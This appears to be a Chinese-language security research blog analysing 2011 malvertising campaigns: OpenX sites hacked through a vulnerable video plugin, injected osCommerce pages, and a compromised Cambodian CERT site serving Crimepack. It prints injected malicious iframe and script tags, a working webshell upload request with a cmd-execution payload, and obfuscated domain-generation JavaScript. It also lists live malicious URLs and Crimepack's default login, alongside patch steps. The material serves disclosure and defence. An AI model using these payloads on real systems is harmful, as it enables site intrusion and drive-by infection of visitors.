<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhEWxfHFaYvY0S-wqZj8q3lwHwU-rhzrrDF7fbj7JJIzlodLvdkIvU59pLlfGFii2ZZMJNKwJpsl4XAAtCAsACokGeUGzJDa81OI1x8pVeC_4bpvzlUL7DccpKqcHn6ONBuxAODl9jHpIE/s1600/willysy_oscommerce_hacked_3.png.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhEWxfHFaYvY0S-wqZj8q3lwHwU-rhzrrDF7fbj7JJIzlodLvdkIvU59pLlfGFii2ZZMJNKwJpsl4XAAtCAsACokGeUGzJDa81OI1x8pVeC_4bpvzlUL7DccpKqcHn6ONBuxAODl9jHpIE/s1600/willysy_oscommerce_hacked_3.png.png" /></a></div><br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgx5WeYDsIXtTuTOtZxzvVasKbDMAn67alNAevwO17iQooujnKGsoIZUH7Bd4eYz2GUyjK0vNOBERNCSYhpEJxrjAIf8LlYoJIdSCUEInTJyHS80E8OY3SGlmf8fYR4pEdqzDzSGsKPlaY/s1600/willysy_oscommerce_hacked_4.png.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgx5WeYDsIXtTuTOtZxzvVasKbDMAn67alNAevwO17iQooujnKGsoIZUH7Bd4eYz2GUyjK0vNOBERNCSYhpEJxrjAIf8LlYoJIdSCUEInTJyHS80E8OY3SGlmf8fYR4pEdqzDzSGsKPlaY/s1600/willysy_oscommerce_hacked_4.png.png" /></a></div><br />
<a name="comment"><b>[9. 後續補充]</b></a><br />
<br />
截至目前(8月19)為止,除了原本兩種惡意程式碼之外,我們有發現到新的 pattern (透過一樣的漏洞插入的):<br />
原本的: <br />
<pre class="brush: html; auto-links: false"><iframe src='http://willysy.com/images/banners/' style='position:absolute;visibility:hidden'></iframe>
</pre><pre class="brush: html; auto-links: false"><script src=http://exero.eu/catalog/jquery.js></script>
</pre><br />
持續觀察到的:<br />
<pre class="brush: html; auto-links: false"><iframe src="http://derryastros.com/images/1/go.php" width="0" height="0" frameborder="0"></iframe>
</pre><pre class="brush: html; auto-links: false"><script src=http://lamacom.net/images/j/></script>
</pre></span>Unknownnoreply@blogger.com3tag:blogger.com,1999:blog-1441759431140700676.post-21743275672010769052011-07-27T02:28:00.001+08:002011-07-27T02:36:37.134+08:00OpenX.org上的插件具有漏洞,導致 dyndns 團隊侵入網站並且透過惡意廣告的手法散佈偽冒的防毒軟體:Personal Shield Pro(作者: Wayne Huang, Chris Hsiao, Sun Huang, NightCola Lin, Fyodor Yarochkin)<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiJZKzVDndAyiv5EPNbovQ1zpVzkkh8jOpzXXbTBOA-joKYAdpfrTVRibG8EB2BYk0wpe9LElYYGN-BFLmZbgqKE4FzH0t7Bcm3wd2aY9OeEYRcrWZxQQ-dv9uzLWKCnz5CBTrI5hpIJIw/s1600/openx_malvertising_personal_shield_pro.png" imageanchor="1" style="margin-left:1em; margin-right:1em"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiJZKzVDndAyiv5EPNbovQ1zpVzkkh8jOpzXXbTBOA-joKYAdpfrTVRibG8EB2BYk0wpe9LElYYGN-BFLmZbgqKE4FzH0t7Bcm3wd2aY9OeEYRcrWZxQQ-dv9uzLWKCnz5CBTrI5hpIJIw/s1600/openx_malvertising_personal_shield_pro.png" /></a></div>目錄:<br />
<a href="#summary">[1. 摘要]</a><br />
<a href="#infection">[2. 感染過程]</a><br />
<a href="#openx">[3. OpenX的漏洞]</a><br />
<a href="#attack">[4. 攻擊方式]</a><br />
<a href="#patch">[5. 如何修補網站]</a><br />
<a href="#exploitpack">[6. Exploit Pack]</a><br />
<a href="#randomization">[7. 變動的惡意網域]</a><br />
<a href="#php_filename">[8. 亂數產生的PHP檔名?]</a><br />
<a href="#dyndns">[9. "dyndns" 團隊]</a><br />
<a href="#list">[10. 被感染的網站列表]</a><br />
<br />
<a name="summary"><b>[1. 摘要]</b></a><br />
<br />
<b>影響:</b> 瀏覽者瀏覽了受感染的網站將導致電腦被裝上 "Personal Shield Pro" 這套"偽"防毒軟體。<br />
<b>起因:</b> 在<a href="http://www.blogger.com/post-create.g?blogID=505418663478597283">OpenX</a>官方網站上<a href="https://developer.openx.org/wiki/download/attachments/16155845/openXVideoAds.zip">提供</a>了具有漏洞的插件。<br />
<b>Exploit pack:</b> 本次事件中所使用的是 g01pack exploit pack。<br />
<b>攻擊團隊:</b> 在內部我們稱之為 "dyndns" 團隊,此團隊也涉及我們在五月多針對Clicksor事件的報導,在更早之前也與其他類型的網頁惡意程式事件有關。<br />
<b>被感染的網站列表:</b><br />
theastrologer.com<br />
bancadellecase.com<br />
thrillldrillls.com<br />
luckymoving.com<br />
fastodds.com<br />
mediabooks.com<br />
dfonline.jp<br />
dailynews.co.za<br />
perefoorum.ee<br />
sasites.co.za<br />
abmotor.pt<br />
medical-tribune.co.jp<br />
diamondcard.it<br />
adrenal-fatigue.de<br />
allergien-behandeln.de<br />
rhr.ru<br />
kuku.ee<br />
handwerkermarkt.de<br />
<br />
<a name="infection"><b>[2. 感染過程]</b></a><br />
<br />
從2009年開始,GMO與阿碼科技便在日本部署了網頁掛馬監控服務平臺,而我們也一直致力於研究網頁惡意程式的威脅。<br />
<br />
從今年五月開始,我們就鎖定了一個團隊:"dyndns"。在五月中旬時,我們報導了一篇:<a href="http://armorize-cht.blogspot.com/2011/05/clicksor_16.html">超過一半以上的惡意廣告來自Clicksor</a>,該事件也與此團體有關。<br />
<br />
而在該篇報導不久之後,此團體即開始攻擊有使用 <a href="http://www.openx.org/">OpenX</a> 來提供廣告功能的網站。瀏覽者一旦瀏覽了被感染的網站,電腦就會被安裝上偽裝的防毒軟體 (普遍稱之為<a href="http://en.wikipedia.org/wiki/Ransomware_(malware)">流氓軟體</a>)。此軟體會取消系統絕大部份的功能,並且透過此現象來讓瀏覽者認為自己的電腦真的中毒。之後此軟體會告訴瀏覽者,解決的方法就是去購買這一套 "流氓軟體",在購買之後,瀏覽者便等同於將自己的信用卡卡號洩露出去。<br />
<br />
以下是一部當瀏覽者瀏覽了此類型網站時所產生的結果 (此網站位於日本,為實際上被感染的網站):<br />
<iframe width="750" height = "468" src="http://www.youtube.com/embed/MeyCTBlI81w" frameborder="0" allowfullscreen></iframe><br />
<span class="fullpost"><br />
<a name="openx"><b>[3. OpenX的漏洞]</b></a><br />
<br />
所有被感染的網站都有一個共通的特性:都安裝了OpenX來提供廣告,其中有些使用的還是最新的版本-2.8.7。此事件中被感染的OpenX檔案大部份是ajs.php,下面為一個完整的URL範例:<br />
<pre class="brush: html; auto-links: false">http://www.theastrologer.com/openx/www/delivery/ajs.php?zoneid=3&cb=4021406622&charset=utf-8&loc=http%3A//theastrologer.com/
</pre>為什麼即使安裝了最新版的OpenX 還是會被入侵呢?為了解開這個原因,我們再進一步的追蹤下去。如同你們所見,在被感染的網站(bancadellecase.it)中,有一隻webshell:<br />
<br />
http://bancadellecase.it/admin/banner/www/admin/plugins/videoReport/lib/tmp-upload-images/image.php<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh53wSj-dcHkCCe4XHsWFT-Q7ogGRCRZiA42mtm7TFGnAuRNF9I4ftfJlIBGYTiz7ebJYGm2PcCPv8xGftPuIXfXBEipVanIFdCzKMyPheftRozboorX_GF6KmITDIyJkiwhyphenhyphenT8OXq-Jjo/s1600/openx_hacked_webshell_malvertising.png" imageanchor="1" style="margin-left:1em; margin-right:1em"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh53wSj-dcHkCCe4XHsWFT-Q7ogGRCRZiA42mtm7TFGnAuRNF9I4ftfJlIBGYTiz7ebJYGm2PcCPv8xGftPuIXfXBEipVanIFdCzKMyPheftRozboorX_GF6KmITDIyJkiwhyphenhyphenT8OXq-Jjo/s1600/openx_hacked_webshell_malvertising.png" /></a></div>Webshell是一個後門程式,允許攻擊者完全掌控被入侵的網站。<br />
<br />
往Webshell存在路徑的上一層走去,我們可以看到有許許多多的檔案,每一個檔案就代表著每次使用者嘗試上傳的記錄:<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEicZBLR2m_T3tTsux5SC7MJ7IEkzl0342K8bfyjNg6SuIjtAYoPSAvS6RLgcBYY0-U_vwWe1jK6OvvSoGFtnJoPfUv3MjwUXjyUXK2Mp7p_X1xvvN03QHpiJHGxG6xRBdm1VEW2LzjNx8E/s1600/openx_hacked_webshell_malvertising_personal_shield_pro.png" imageanchor="1" style="margin-left:1em; margin-right:1em"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEicZBLR2m_T3tTsux5SC7MJ7IEkzl0342K8bfyjNg6SuIjtAYoPSAvS6RLgcBYY0-U_vwWe1jK6OvvSoGFtnJoPfUv3MjwUXjyUXK2Mp7p_X1xvvN03QHpiJHGxG6xRBdm1VEW2LzjNx8E/s1600/openx_hacked_webshell_malvertising_personal_shield_pro.png" /></a></div><br />
第一個成功的上傳我們可以發現到是在六月26日,而從圖中我們可以發現一個明顯的情況:在攻擊者成功上傳了webshell後,他便隨即將目錄的存取權限限制起來,此行為導致之後的上傳行為都失效。<br />
<br />
經過我們分析,WebShell應該是透過 OpenX 的一個 Video Plugin 的漏洞上傳的 ( <a href="http://www.openx.org/docs/2.8/userguide/video%20ads%20player%20configuration">OpenX 網站</a>上面的<a href="https://developer.openx.org/wiki/download/attachments/16155845/openXVideoAds.zip">連結</a> )<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh85yt-_VqljREwkgA0Q_-aO_za9rzvpFE5b2MCFrJszsDR15Qf_cFG-gy2mdYUMjXItjz5RoYrtQ6qKgPkp1TegztRD5YFCOxihozlWghiLc8r9Wlo7OM5YXjD7oLH_z_XOU31RpkdNGE/s1600/openx_malvertising_personal_shield_pro_openx_website.png" imageanchor="1" style="margin-left:1em; margin-right:1em"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh85yt-_VqljREwkgA0Q_-aO_za9rzvpFE5b2MCFrJszsDR15Qf_cFG-gy2mdYUMjXItjz5RoYrtQ6qKgPkp1TegztRD5YFCOxihozlWghiLc8r9Wlo7OM5YXjD7oLH_z_XOU31RpkdNGE/s1600/openx_malvertising_personal_shield_pro_openx_website.png" /></a></div>此壓縮檔包含了OpenX Video Plugin版本1.1,此版本包含了<a href="http://sourceforge.net/projects/openflashchart/files/open-flash-chart/">Open Flash Chart</a>,該套件自從2009年後就沒有被更新,並且存在一個已知的漏洞 (未限制上傳檔案內容,<a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=2009-4140">CVE-2009-4140</a>)<br />
<br />
如下圖所示,在下載並且安裝從 Openx 上的這個插件後,可以看到此套件的版本為1.1:<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEifr4pWMEqcXLIZRDceiw1hMAGYNDFtk2zlrKG6_Q0cbjh_UbvEbKcSdmzOiOBV2DrT1axhmb2r4__GhnGbsml_D3mprTlCwUE2zDbDfRn5bVxPKQDko0cefQwIpkrJKlQxMyqeQUzVp5Y/s1600/2.PNG" imageanchor="1" style="margin-left:1em; margin-right:1em"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEifr4pWMEqcXLIZRDceiw1hMAGYNDFtk2zlrKG6_Q0cbjh_UbvEbKcSdmzOiOBV2DrT1axhmb2r4__GhnGbsml_D3mprTlCwUE2zDbDfRn5bVxPKQDko0cefQwIpkrJKlQxMyqeQUzVp5Y/s1600/2.PNG" /></a></div><br />
1.1版本已經屬於舊的版本,目前該Video插件最新版的是1.8.7,如下所示:<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjghbGLyzD-PXVzd5Shyphenhyphen6QwRwSC1Q4Lgf5DHBnJzYSfvkvTfnLAxBv_jUv6U9aP4IrkK_Gw37ozS-Bju5XglrqvFE0_c4pPpFv7vodNsMt41dFWCXEeTZRr8Y3KhHHvW4hzn2-BCzs4BrE/s1600/1.PNG" imageanchor="1" style="margin-left:1em; margin-right:1em"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjghbGLyzD-PXVzd5Shyphenhyphen6QwRwSC1Q4Lgf5DHBnJzYSfvkvTfnLAxBv_jUv6U9aP4IrkK_Gw37ozS-Bju5XglrqvFE0_c4pPpFv7vodNsMt41dFWCXEeTZRr8Y3KhHHvW4hzn2-BCzs4BrE/s1600/1.PNG" /></a></div><br />
<a name="attack"><b>[4. 攻擊方式]</b></a><br />
<br />
1. 攻擊者首先測試 ofc_upload_image.php 檔案是否存在:<br />
http://victim.com/www/admin/plugins/videoReport/lib/ofc2/ofc_upload_image.php<br />
<br />
2. 如果存在,攻擊者則透過下面的要求建立一個簡單的webshell:<br />
http://victim.com/www/admin/plugins/videoReport/lib/ofc2/ofc_upload_image.php?name=shell.php&HTTP_RAW_POST_DATA=<?php @system($_GET[cmd]);?><br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg891Ps9NHgOxredLMLPhJo3qIG1h78LH9VBNjodIFbhifopHZ8IutbHWYDJXTjP2-CyV1a7nWGI2fdaSUoSLSAgvlzRS_WLsSSs_kFqnsUspybZJ48NaN7fPUs0SbXXmuzheJL5v40H7c/s1600/openx_malvertising_personal_shield_pro_openx_website3.PNG" imageanchor="1" style="margin-left:1em; margin-right:1em"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg891Ps9NHgOxredLMLPhJo3qIG1h78LH9VBNjodIFbhifopHZ8IutbHWYDJXTjP2-CyV1a7nWGI2fdaSUoSLSAgvlzRS_WLsSSs_kFqnsUspybZJ48NaN7fPUs0SbXXmuzheJL5v40H7c/s1600/openx_malvertising_personal_shield_pro_openx_website3.PNG" /></a></div><br />
3. 攻擊者接下來確認shell是否有被成功的上傳:<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEghiEXMQXO52lrQKiuDI2pyjWwZzmZwuigEPIEiN3RT3h5E0hWOK9tF-AlLxf0PuAZ5aiia0IhKQQCyPw7KsVTb2w9jkG8vQDHCfgPk_YTrtUH8jApr8MaSAZiO3-_Hi2fAGKVGX5jPctI/s1600/openx_hacked_webshell_malvertising4.PNG" imageanchor="1" style="margin-left:1em; margin-right:1em"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEghiEXMQXO52lrQKiuDI2pyjWwZzmZwuigEPIEiN3RT3h5E0hWOK9tF-AlLxf0PuAZ5aiia0IhKQQCyPw7KsVTb2w9jkG8vQDHCfgPk_YTrtUH8jApr8MaSAZiO3-_Hi2fAGKVGX5jPctI/s1600/openx_hacked_webshell_malvertising4.PNG" /></a></div><br />
4. 一旦上傳成功,攻擊者則可以透過以下URL執行任何系統指令:<br />
http://victim.com/www/admin/plugins/videoReport/lib/tmp-upload-images/shell.php?cmd=ipconfig<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh2H8jFCWHcc99fEiKoZZAV3Qg8tYQQwEbi6DoGzLKssx1zvOYXE7SdOcXSrQv8Llo6QBzLzY1K9gMArGWSoCG9w7Bix4xsgOBo403WucULqe347SLfWPod3VbUpOjyX1f_H40iDpHMOmg/s1600/openx_hacked_webshell_malvertising5.PNG" imageanchor="1" style="margin-left:1em; margin-right:1em"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh2H8jFCWHcc99fEiKoZZAV3Qg8tYQQwEbi6DoGzLKssx1zvOYXE7SdOcXSrQv8Llo6QBzLzY1K9gMArGWSoCG9w7Bix4xsgOBo403WucULqe347SLfWPod3VbUpOjyX1f_H40iDpHMOmg/s1600/openx_hacked_webshell_malvertising5.PNG" /></a></div><br />
5. 使用上傳好的shell來將惡意的javascript插入 OpenX 的php檔案。以本次事件來舉例:<br />
<br />
<pre class="brush: html; auto-links: false">http://www.theastrologer.com/openx/www/delivery/ajs.php?zoneid=3&cb=4021406622&charset=utf-8&loc=http%3A//theastrologer.com/
</pre><br />
<a name="patch"><b>[5. 如何修補網站]</b></a><br />
<br />
網站管理者需要點選 OpenX 管理介面的 "插件" 分頁去確認他們所使用的 openXVideoAds 版本 (如上一節所示)。只要是版本比1.8.7還舊的,可以透過以下簡單的步驟修正這個漏洞:<br />
<br />
1. 進入 ofc2 目錄,一般常見路徑如下:<br />
/admin/banner/www/admin/plugins/videoReport/lib/ofc2<br />
<br />
2. 在該目錄下,找到 ofc_upload_image.php 檔案之後清空此檔案的內容:<br />
/admin/banner/www/admin/plugins/videoReport/lib/ofc2/ofc_upload_image.php<br />
<br />
此即 1.8.7 修正此漏洞的方式。<br />
<br />
<a name="exploitpack"><b>[6. Exploit Pack]</b></a><br />
<br />
本次事件觀察到的Exploit Pack為 g01pack exploit pack:<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiCue6PI2oYNqg55XZQpL-dQyfgJAqGYKbDqAvFBmZkRehuGN7cQ9i9qldqDtaJdjCofuzV5zNM7jz6yjsiXYHOcDHnRKdSGb9ynIYu4KT0ob3p2crL7Qcz_p_cwtF2_2fDTSrdGELIe9o/s1600/g01pack_malvertising.png" imageanchor="1" style="margin-left:1em; margin-right:1em"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiCue6PI2oYNqg55XZQpL-dQyfgJAqGYKbDqAvFBmZkRehuGN7cQ9i9qldqDtaJdjCofuzV5zNM7jz6yjsiXYHOcDHnRKdSGb9ynIYu4KT0ob3p2crL7Qcz_p_cwtF2_2fDTSrdGELIe9o/s1600/g01pack_malvertising.png" /></a></div><br />
<a name="randomization"><b>[7. 變動的惡意網域]</b></a><br />
<br />
接下來我們來看看在這波攻擊中,攻擊者所使用的網域:<br />
<br />
blogtxcl.dyndns-blog.com<br />
blogtvaj.dyndns-blog.com<br />
blogkmra.dyndns-blog.com<br />
blogrsxg.dyndns-blog.com<br />
blogopud.dyndns-blog.com<br />
bloghinw.dyndns-blog.com<br />
blogcdir.dyndns-blog.com<br />
blogwwbk.dyndns-blog.com<br />
blogrrwf.dyndns-blog.com<br />
blogootc.dyndns-blog.com<br />
<br />
以及:<br />
<br />
officekhmv.dyndns-office.com<br />
officetnsb.dyndns-office.com<br />
officetlqz.dyndns-office.com<br />
officevfkt.dyndns-office.com<br />
officeluzi.dyndns-office.com<br />
officeeinw.dyndns-office.com<br />
officejmra.dyndns-office.com<br />
officeklqz.dyndns-office.com<br />
officecdir.dyndns-office.com<br />
officexcgp.dyndns-office.com<br />
officeccgp.dyndns-office.com<br />
<br />
顯然,這些網域有著相同的格式:_X_random.dyndns-X.com。在第一個例子中,X=blog,而在第二個例子中,X=office。事實上,這就是變動網域如何產生的方式。讓我們來看看在OpenX 的 ajs.php 中插入的惡意程式碼片段:<br />
<pre class="brush: html; auto-links: false">http://www.theastrologer.com/openx/www/delivery/ajs.php?zoneid=3&cb=4021406622&charset=utf-8&loc=http%3A//theastrologer.com/
</pre>以下為插入的一部份程式碼:<br />
<pre class="brush: js; auto-links: false">function T(harlots, ralphed) {
soberer = harlots;
var r = String("abcdefghi5zI9".substr(0, 9) + "jklmnopqrA2B".substr(0, 9) + "stuvwxyz");
var limpsey = new String("charARvGp".substr(0, 5) + "t");
var doglegs = "length";
footies = new Date();
var leisure = Math.floor(footies.getUTCHours());
var wyverns = footies.getUTCDate();
var dusters = footies.getUTCMonth();
var evinces = footies.getUTCFullYear();
var anchors = (leisure % r[doglegs]);
var a = (leisure + wyverns) % r[doglegs];
var romanos = (leisure + wyverns + dusters) % r[doglegs];
var sorcery = (leisure + wyverns + dusters + evinces) % r[doglegs];
soberer += r[limpsey](anchors);
soberer += r[limpsey](a);
soberer += r[limpsey](romanos);
soberer += r[limpsey](sorcery);
return soberer + ralphed;
}
</pre>而這邊說明了 "T" 這個函式是如何被呼叫的:<br />
<pre class="brush: js; auto-links: false">var soberer = T(new String(\"blou0s\".substr(0,3)+\"glqSm\".substr(0,1)), new String(\".dyndns-\"+\"blog.com\"));
</pre>String(\"blou0s\".substr(0,3)+\"glqSm\".substr(0,1)) 可以解為:<br />
<b>"blog"</b><br />
而 String(\".dyndns-\"+\"blog.com\") 可以解為:<br />
<b>"dyndns-blog.com"</b><br />
<br />
透過上述的演算法產生了變動的惡意網域 (_X_random.dyndns-X.com)。此演算法會隨著不同的年、月、日、時,產生不同的惡意網域。<br />
<br />
<a name="php_filename"><b>[8. 亂數產生的PHP檔名?]</b></a><br />
<br />
目前我們已經了解了惡意程式碼所產生的網域名部份,現在讓我們來看看透過它產生出來的<b>整個URL</b>。舉例如下:<br />
<pre class="brush: html; auto-links: false">http://nwetdsou.dyndns-web.com/images/aeea8469e09d31020332ac926f183eaa.php?thread_id=2&f=131263&topic_id=de_at&
</pre>讓我們來看看<b>檔名</b>部份:aeea8469e09d31020332ac926f183eaa.php。看起來是亂數產生的,是嗎? 其實並不是,如果透過<a href="http://www.google.com.tw/search?sourceid=chrome&ie=UTF-8&q=aeea8469e09d31020332ac926f183eaa.php">Google搜尋它</a>,可以看到我們之前的報告:<a href="http://armorize-cht.blogspot.com/2011/05/clicksor_16.html">超過一半以上的惡意廣告來自Clicksor</a>。(該篇文章中所提到的惡意網頁目前已失效,僅剩結果可供參考)<br />
<br />
所以看似亂數的 "aeea8469e09d31020332ac926f183eaa.php" 在過去<b>確實出現過</b>。<br />
<br />
此外,在我們與GMO-HS 合作的惡意程式研究中心中,此檔案 "aeea8469e09d31020332ac926f183eaa.php" 在最近也出現多次,部份與此次事件有關,部份則是屬於其他事件。<b>一個有趣的狀況是:儘管網域名稱是會變動的,但是檔名的部份卻是固定的,只是讓人看起來以為是亂數產生。</b><br />
舉例:<br />
<pre class="brush: html; auto-links: false">http://nwetdsou.dyndns-web.com/images/aeea8469e09d31020332ac926f183eaa.php?thread_id=2&f=131263&topic_id=de_at&
http://set.gambulingwebsites.com/news/aeea8469e09d31020332ac926f183eaa.php?thread_id=2&f=5090485&topic_id=1994&
http://tracks.fresnobabies.com/news/aeea8469e09d31020332ac926f183eaa.php?start=2&thread_id=3336736&forum_id=1992&
http://vvvvvv.dyndns-mail.com/news/aeea8469e09d31020332ac926f183eaa.php?start=2&thread_id=3271149&forum_id=1997&
http://tracks.fresnobabies.com/news/aeea8469e09d31020332ac926f183eaa.php?start=2&thread_id=2336475&forum_id=1992&
http://blog.equine-webdesign.com/news/aeea8469e09d31020332ac926f183eaa.php?start=2&thread_id=2328756&forum_id=2010&
http://grand.atlantahomevaluesnow.com/news/aeea8469e09d31020332ac926f183eaa.php?start=2&thread_id=56082781&forum_id=1992&
http://payments.cavatars.mobi/news/aeea8469e09d31020332ac926f183eaa.php?start=2&thread_id=55210399&forum_id=1991&
</pre><br />
<a name="dyndns"><b>[9. "dyndns" 團隊]</b></a><br />
<br />
因此,這些看似亂數的檔名 "aeea8469e09d31020332ac926f183eaa.php" 並不是真的亂數產生,實際上,這是一個普遍被"dyndns"團隊拿來使用的檔名,而且也在我們五月份的報告(<a href="http://armorize-cht.blogspot.com/2011/05/clicksor_16.html">超過一半以上的惡意廣告來自Clicksor</a>)中出現,除此之外,在其他事件中也有看到此種檔名的蹤跡。<br />
<br />
<b><a name="#list">[10. 被感染的網站列表]</a></b><br />
以下為在此次事件中受影響的網站:<br />
<br />
theastrologer.com<br />
bancadellecase.com<br />
thrillldrillls.com<br />
luckymoving.com<br />
fastodds.com<br />
mediabooks.com<br />
dfonline.jp<br />
dailynews.co.za<br />
perefoorum.ee<br />
sasites.co.za<br />
abmotor.pt<br />
medical-tribune.co.jp<br />
diamondcard.it<br />
adrenal-fatigue.de<br />
allergien-behandeln.de<br />
rhr.ru<br />
kuku.ee<br />
handwerkermarkt.de<br />
<br />
<br />
</span>Unknownnoreply@blogger.com3tag:blogger.com,1999:blog-1441759431140700676.post-16100564493610109032011-07-12T01:20:00.001+08:002011-07-13T23:55:35.022+08:00柬埔寨電腦網路危機處理中心(www.camcert.gov.kh)散佈惡意程式(作者: GlobalSign 團隊, Armorize成員:Wayne Huang, Chris Hsiao, Sun Huang, NightCola Lin, Fyodor Yarochkin)<br />
<br />
從今年年初開始,GlobalSign就和阿碼共同建立了一個專門掃描惡意網站的平臺。<br />
<br />
在七月一日(星期五)時,我們發現到部份被感染的網站被插入了一個iframe指向 www.camcert.gov.kh,一個位於柬埔寨的<b>Cert單位</b>。<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgend8Hg5FazaaWVoLr_LY4CBXWJOsdbKjbZuWWj64zk1rr9eyNhzgSI6OKMBzDraTXOnGKt7RKVncq4mUeFJdb6RJ4_HSRV1chQaFySh0FOHkFTPknGj5nock4kbqcpv4rEefdlkPXu4I/s1600/cambodia_cert_hacked_cropped.png" imageanchor="1" style="margin-left:1em; margin-right:1em"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgend8Hg5FazaaWVoLr_LY4CBXWJOsdbKjbZuWWj64zk1rr9eyNhzgSI6OKMBzDraTXOnGKt7RKVncq4mUeFJdb6RJ4_HSRV1chQaFySh0FOHkFTPknGj5nock4kbqcpv4rEefdlkPXu4I/s1600/cambodia_cert_hacked_cropped.png" /></a></div><iframe width="750" height = "468" src="http://www.youtube.com/embed/UfY0pCZXF8o" frameborder="0" allowfullscreen></iframe><br />
我們立即著手分析CamCERT的網站,證實了他確實被入侵並且已被植入了CramePack這一個Exploit Pack,會針對 <a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0003">CVE-2006-0003</a>, <a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0806">CVE-2010-0806</a>, <a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=2009-3867">CVE-2009-3867</a>, <a href="http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0806">CVE-2010-0806</a>, <a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5659">CVE-2007-5659</a>, <a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0927">CVE-2009-0927</a>, <a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=2008-2992">CVE-2008-2992</a>, and <a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3269">CVE-2009-3269</a> 這些弱點來產生 Drive-by Download的行為,讓瀏覽者自動下載惡意程式並且執行。<br />
<span class="fullpost"><br />
被感染的網站包含了一段被插入的javascript,會動態產生一個iframe指向www.camcert.gov.kh:<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhdHtEFTyKQ825d5Y-TyPtg68M2RLOqcnglJO4Y0krV8T4bQEzjztYOApPKBr3QHmX4zULlx1pEkbHIV8wMrKVnjaNH91gU_nt8qh82HbrXvVC2Ptk5qePVq-nQY60NZRfHHE-jZj_STaI/s1600/cambodia_cert_hacked2.png" imageanchor="1" style="margin-left:1em; margin-right:1em"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhdHtEFTyKQ825d5Y-TyPtg68M2RLOqcnglJO4Y0krV8T4bQEzjztYOApPKBr3QHmX4zULlx1pEkbHIV8wMrKVnjaNH91gU_nt8qh82HbrXvVC2Ptk5qePVq-nQY60NZRfHHE-jZj_STaI/s1600/cambodia_cert_hacked2.png" /></a></div>產生的iframe如下:<br />
<pre class="brush: html; auto-links: false">http://www.camcert.gov.kh/userfiles/.cache/nolock/index.php
</pre>Crimepack的植入點在 http://www.camcert.gov.kh/userfiles/.cache 裡面的 "nolock" 目錄:<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjmPqdbPHOi5ZYi15L5Bi2Ki_SiPQMURhSC3Uq7ZuvWydtfrzPEC0Sh3ZTTVhywPHOZ6T_oUhEjEUj6hcSlFOphAWyS6fxq-qwjb_bj-SohV22f7PxDKNGeIbk_WCpNLgjERdb-GRQm6rs/s1600/cambodia_cert_hacked3.png" imageanchor="1" style="margin-left:1em; margin-right:1em"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjmPqdbPHOi5ZYi15L5Bi2Ki_SiPQMURhSC3Uq7ZuvWydtfrzPEC0Sh3ZTTVhywPHOZ6T_oUhEjEUj6hcSlFOphAWyS6fxq-qwjb_bj-SohV22f7PxDKNGeIbk_WCpNLgjERdb-GRQm6rs/s1600/cambodia_cert_hacked3.png" /></a></div>透過瀏覽器連向http://www.camcert.gov.kh/userfiles/.cache/nolock/control.php,會出現Http Basic authentication的認證,在此時輸入Crimepack的預設帳號:"crimepack",及空白密碼後,即可看到Crimepack的UI介面,如同此篇報導一開始秀出的畫面。<br />
